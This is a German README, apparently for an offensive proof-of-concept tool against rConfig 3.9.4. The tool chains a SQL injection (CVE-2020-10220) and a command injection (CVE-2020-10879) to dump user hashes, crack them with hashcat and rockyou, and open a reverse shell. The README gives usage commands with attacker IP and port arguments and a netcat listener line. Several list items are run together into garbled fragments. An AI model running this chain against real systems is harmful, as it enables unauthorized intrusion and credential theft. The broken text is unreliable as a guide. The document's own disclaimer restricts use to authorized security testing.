
Kombinierte PoCs für rConfig: SQL Injection (CVE-2020-10220) & Command Injection (CVE-2020-10879)
Dieser PoC zielt auf rConfig Version 3.9.4 ab und demonstriert die Ausnutzung durch eine Kombination von SQL-Injection und Remote-Command-Injection-Sicherheitslücken. Er automatisiert den Vorgang:
rockyou und best64.rules zu knackenDieses Skript basiert auf und kombiniert zwei originale PoCs:
Es wurde modifiziert, um das Knacken und optionales Shell Spawning zu automatisieren.
requests-Bibliothek (pip install requests)hashcat installiert und über die Kommandozeile verfügbarrockyou.txt (oder Äquivalent) unter /usr/share/wordlists/rockyou.txt/usr/share/hashcat/rules/best64.ruleNur Benutzer und Hashes auslesen:
python3 rConfig_rce.py https://target
Benutzer auslesen, Passwörter knacken und RCE versuchen (erfordert Angreifer-IP und Port für Reverse Shell):
python3 rConfig_rce.py https://target attacker_ip attacker_port
admin-Kontos für die Command-Injection-Phase.nc -lvnp 80) auf Ihrem Angreifer-Rechner läuft, um die Reverse Shell zu empfangen.Dieses Tool ist nur für autorisierte Sicherheitstests und Bildungszwecke vorgesehen. Die unbefugte Nutzung gegen Systeme ohne Erlaubnis ist illegal und unethisch.